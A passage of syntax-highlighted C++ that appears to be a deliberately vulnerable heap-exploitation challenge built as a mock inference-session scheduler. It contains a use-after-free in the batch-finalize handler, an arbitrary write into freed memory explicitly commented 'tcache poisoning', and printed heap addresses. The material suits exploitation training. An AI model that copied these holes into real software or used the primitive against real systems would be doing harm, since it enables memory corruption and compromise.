class="n">state</span><span class="o">-&gt;</span><span class="n">task_desc</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">handler</span> </span></span><span class="line"><span class="cl"> <span class="o">&lt;&lt;</span> <span class="s">&#34; ctx=&#34;</span> <span class="o">&lt;&lt;</span> <span class="o">&amp;</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">task_desc</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">ctx</span> </span></span><span class="line"><span class="cl"> <span class="o">&lt;&lt;</span> <span class="s">&#34; tag=&#39;&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">task_desc</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">tag</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;&#39;&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;scheduler offline&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">// 5 </span></span></span><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="nf">allocate_session_tensor</span><span class="p">(</span><span class="n">runtime_state</span> <span class="o">*</span><span class="n">state</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">slot</span><span class="p">,</span> <span class="n">tensor_bytes</span><span class="p">,</span> <span class="n">alias</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;session.slot(0-15)&gt; &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cin</span> <span class="o">&gt;&gt;</span> <span class="n">slot</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;session.tensor_bytes&gt; &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cin</span> <span class="o">&gt;&gt;</span> <span class="n">tensor_bytes</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;session.alias&gt; &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cin</span> <span class="o">&gt;&gt;</span> <span class="n">alias</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="n">slot</span> <span class="o">&lt;=</span> <span class="mh">0xF</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">session_handle</span> <span class="o">*</span><span class="n">session</span> <span class="o">=</span> <span class="p">(</span><span class="n">session_handle</span> <span class="o">*</span><span class="p">)</span><span class="nf">malloc</span><span class="p">(</span><span class="mh">0x50u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">session</span><span class="o">-&gt;</span><span class="n">slot_id</span> <span class="o">=</span> <span class="n">slot</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">session</span><span class="o">-&gt;</span><span class="n">payload_size</span> <span class="o">=</span> <span class="n">tensor_bytes</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">session</span><span class="o">-&gt;</span><span class="n">payload</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="nf">malloc</span><span class="p">(</span><span class="n">tensor_bytes</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">session</span><span class="o">-&gt;</span><span class="n">payload</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">memset</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">session</span><span class="o">-&gt;</span><span class="n">payload</span><span class="p">,</span> <span class="mi">65</span><span class="p">,</span> <span class="n">tensor_bytes</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">snprintf</span><span class="p">(</span><span class="n">session</span><span class="o">-&gt;</span><span class="n">alias</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="s">&#34;%s&#34;</span><span class="p">,</span> <span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">alias</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">v16</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">state</span> <span class="o">+</span> <span class="mi">8</span> <span class="o">*</span> <span class="n">slot</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v17</span> <span class="o">=</span> <span class="o">*</span><span class="p">((</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v16</span> <span class="o">+</span> <span class="mi">29</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">((</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v16</span> <span class="o">+</span> <span class="mi">13</span><span class="p">)</span> <span class="o">=</span> <span class="n">session</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">((</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v16</span> <span class="o">+</span> <span class="mi">29</span><span class="p">)</span> <span class="o">=</span> <span class="o">++</span><span class="n">v17</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">session</span><span class="o">-&gt;</span><span class="n">generation</span> <span class="o">=</span> <span class="n">v17</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">session</span><span class="o">-&gt;</span><span class="n">postproc</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="p">)(</span><span class="n">session_handle</span> <span class="o">*</span><span class="p">))</span><span class="n">session_postproc_xor_stride</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">state</span><span class="o">-&gt;</span><span class="n">session_active</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;session tensor ready slot=&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">slot</span> </span></span><span class="line"><span class="cl"> <span class="o">&lt;&lt;</span> <span class="s">&#34; handle=&#34;</span> <span class="o">&lt;&lt;</span> <span class="o">&amp;</span><span class="n">session</span> </span></span><span class="line"><span class="cl"> <span class="o">&lt;&lt;</span> <span class="s">&#34; payload=&#34;</span> <span class="o">&lt;&lt;</span> <span class="o">&amp;</span><span class="n">session</span><span class="o">-&gt;</span><span class="n">payload</span> </span></span><span class="line"><span class="cl"> <span class="o">&lt;&lt;</span> <span class="s">&#34; postproc=&#34;</span> <span class="o">&lt;&lt;</span> <span class="o">&amp;</span><span class="n">session</span><span class="o">-&gt;</span><span class="n">postproc</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;session tensor allocation failed&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;session tensor request invalid&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">// 6 </span></span></span><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="nf">complete_batch_inference</span><span class="p">(</span><span class="n">runtime_state</span> <span class="o">*</span><span class="n">state</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">slot</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;ssession.slot&gt; &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cin</span> <span class="o">&gt;&gt;</span> <span class="n">slot</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="n">slot</span> <span class="o">&gt;</span> <span class="mh">0xF</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;session slot invalid&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">session_active</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;session slot not active&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">sessions</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;session slot empty&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">sessions</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">payload</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">sessions</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">payload_size</span> <span class="o">&gt;=</span> <span class="mi">2</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span> <span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">sessions</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">payload_size</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">state</span><span class="o">-&gt;</span><span class="n">sessions</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">payload</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">^=</span> <span class="p">(</span><span class="mi">13</span> <span class="o">*</span> <span class="n">i</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">free</span><span class="p">(</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">sessions</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">payload</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="p">)())</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">sessions</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">postproc</span> <span class="o">!=</span> <span class="n">session_postproc_clamp_negative_bytes</span> </span></span><span class="line"><span class="cl"> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="p">)())</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">sessions</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">postproc</span> <span class="o">!=</span> <span class="n">session_postproc_xor_stride</span> </span></span><span class="line"><span class="cl"> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="p">)())</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">sessions</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">postproc</span> <span class="o">!=</span> <span class="n">session_postproc_shift_right</span> </span></span><span class="line"><span class="cl"> <span class="o">&amp;&amp;</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">sessions</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">postproc</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;postproc profile invalid, fallback to default pipeline&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">state</span><span class="o">-&gt;</span><span class="n">sessions</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">postproc</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="p">)(</span><span class="n">session_handle</span> <span class="o">*</span><span class="p">))</span><span class="n">session_postproc_xor_stride</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">sessions</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">postproc</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">state</span><span class="o">-&gt;</span><span class="n">sessions</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span><span class="o">-&gt;</span><span class="nf">postproc</span><span class="p">(</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">sessions</span><span class="p">[</span><span class="n">slot</span><span class="p">]);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">operator</span> <span class="nf">delete</span><span class="p">(</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">sessions</span><span class="p">[</span><span class="n">slot</span><span class="p">],</span> <span class="mh">0x50u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">state</span><span class="o">-&gt;</span><span class="n">session_active</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;batch inference finalized, session recycled&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">// 7 </span></span></span><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="nf">patch_session_metadata</span><span class="p">(</span><span class="n">runtime_state</span> <span class="o">*</span><span class="n">state</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">slot</span><span class="p">,</span> <span class="n">qword_index</span><span class="p">,</span> <span class="n">qword_value</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;diag.session.slot&gt; &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cin</span> <span class="o">&gt;&gt;</span> <span class="n">slot</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;diag.qword_index&gt; &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cin</span> <span class="o">&gt;&gt;</span> <span class="n">qword_index</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;diag.qword_value(u64)&gt; &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cin</span> <span class="o">&gt;&gt;</span> <span class="n">qword_value</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">slot</span> <span class="o">&lt;=</span> <span class="mh">0xFu</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">sessions</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;session handle missing&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">session_active</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;diagnostic patch requires recycled session context&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">qword_index</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">state</span><span class="o">-&gt;</span><span class="n">sessions</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">slot_id</span> <span class="o">=</span> <span class="n">qword_value</span><span class="p">;</span> <span class="c1">// tcache poisoning </span></span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;diagnostic patch applied at &#34;</span> <span class="o">&lt;&lt;</span> <span class="o">&amp;</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">sessions</span><span class="p">[</span><span class="n">slot</span><span class="p">]</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;diagnostic offset policy allows qword_index=0 only&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;diagnostic patch args invalid&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">// 8 </span></span></span><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="nf">provision_worker_profile</span><span class="p">(</span><span class="n">runtime_state</span> <span class="o">*</span><span class="n">state</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">worker_profiles_end</span> <span class="o">-</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">worker_profiles_begin</span> <span class="o">&lt;=</span> <span class="mh">0x1f8</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">worker_profile</span> <span class="o">*</span><span class="n">worker</span> <span class="o">=</span> <span class="p">(</span><span class="n">worker_profile</span> <span class="o">*</span><span class="p">)</span><span class="nf">malloc</span><span class="p">(</span><span class="mh">0x50u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;worker.cpu_quota&gt; &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cin</span> <span class="o">&gt;&gt;</span> <span class="n">worker</span><span class="o">-&gt;</span><span class="n">cpu_quota</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;worker.mem_quota&gt; &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cin</span> <span class="o">&gt;&gt;</span> <span class="n">worker</span><span class="o">-&gt;</span><span class="n">mem_quota</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;worker.io_weight&gt; &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cin</span> <span class="o">&gt;&gt;</span> <span class="n">worker</span><span class="o">-&gt;</span><span class="n">io_weight</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;worker.latency_slo&gt; &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cin</span> <span class="o">&gt;&gt;</span> <span class="n">worker</span><span class="o">-&gt;</span><span class="n">latency_slo</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;worker.replicas&gt; &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cin</span> <span class="o">&gt;&gt;</span> <span class="n">worker</span><span class="o">-&gt;</span><span class="n">replicas</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;worker.region_code&gt; &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cin</span> <span class="o">&gt;&gt;</span> <span class="n">worker</span><span class="o">-&gt;</span><span class="n">region_code</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;worker.memo&gt; &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cin</span> <span class="o">&gt;&gt;</span> <span class="n">worker</span><span class="o">-&gt;</span><span class="n">memo</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">snprintf</span><span class="p">(</span><span class="n">worker</span><span class="o">-&gt;</span><span class="n">memo</span><span class="p">,</span> <span class="mh">0x20u</span><span class="p">,</span> <span class="s">&#34;%s&#34;</span><span class="p">,</span> <span class="n">worker</span><span class="o">-&gt;</span><span class="n">memo</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">worker_profiles_end</span> <span class="o">==</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">worker_profiles_cap</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">worker_vector_realloc_insert</span><span class="p">(</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">worker_profiles_begin</span><span class="p">,</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">worker_profiles_end</span><span class="p">,</span> <span class="n">worker</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">worker_profiles_end</span> <span class="o">=</span> <span class="p">(</span><span class="n">worker_profile</span> <span class="o">*</span><span class="p">)</span><span class="n">worker</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">state</span><span class="o">-&gt;</span><span class="n">worker_profiles_end</span> <span class="o">=</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">worker_profiles_end</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;worker profile provisioned handle=&#34;</span> <span class="o">&lt;&lt;</span> <span class="o">&amp;</span><span class="n">worker</span> </span></span><span class="line"><span 